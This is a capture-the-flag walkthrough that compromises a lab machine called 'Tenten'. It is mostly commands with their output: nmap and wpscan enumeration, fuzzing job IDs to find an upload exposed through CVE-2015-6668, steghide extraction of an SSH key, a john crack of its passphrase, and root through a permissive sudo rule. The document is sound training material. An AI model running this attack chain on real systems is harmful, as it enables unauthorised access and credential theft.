Machine: Tenten
OS: Linux
Target IP: 10.10.10.10
- Nmap
$ sudo nmap -A -Pn -sV -O -oN tenten_nmap.txt 10.10.10.10
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-22 14:05 IST
Nmap scan report for 10.10.10.10
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.8 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 236.28 ms 10.10.14.1
2 236.89 ms 10.10.10.10
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds
- wpscan
$ sudo wpscan -u http://10.10.10.10 -e --log tenten_wpscan.txt
[+] We found 1 plugins:
[+] Name: job-manager - v7.2.5
| Latest version: 0.7.25 (up to date)
| Last updated: 2015-08-25T22:44:00.000Z
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | takis | takis |
| 2 | user1 | user1 |
+----+-------+-------+
- Complete output of wpscan is at https://pastebin.com/mR5tMvrh
- The Job-manager plugin has a CVE-2015-6668
- Visit http://10.10.10.10/index.php/ and click on Job Listing and click on Apply
- In the URL you’ll see the URL is http://10.10.10.10/index.php/jobs/apply/8/
- We see there’s a number in the end. It is an
IDfrom the wordpress mysql database.
Let’s try to fuzz it.
$ for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application: – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application: Application – Job Portal</title>
15: <title>Job Application: Application – Job Portal</title>
- The content on 13th line
HackerAccessGrantedlooks interesting. - According to the CVE,
The wordpress directory structure for the uploaded files is known as /wp-content/uploads/%year%/%month%/%filename%
-
Visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
#####Note: There’s a POC in the CVE which will help you to get the file. In my case I checked the file with.png, .jpeg and .jpgextensions manually. -
Download the image
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
- Use steghide with no passphrase
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
- Use sshng2john
$ python sshng2john.py id_rsa > id_rsa.encrypted
- Use john to get passphrase
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
1g 0:00:00:12 DONE (2017-08-22 16:28) 0.07782g/s 1116Kp/s 1116Kc/s 1116KC/s *7¡Vamos!
Session completed
- SSH
$ ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ fuckin
takis@tenten:~$ fuckin ls
user.txt
takis@tenten:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
takis@tenten:~$ strings /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
takis@tenten:~$ sudo fuckin cat /root/root.txt
XXXXXX
keep it up!
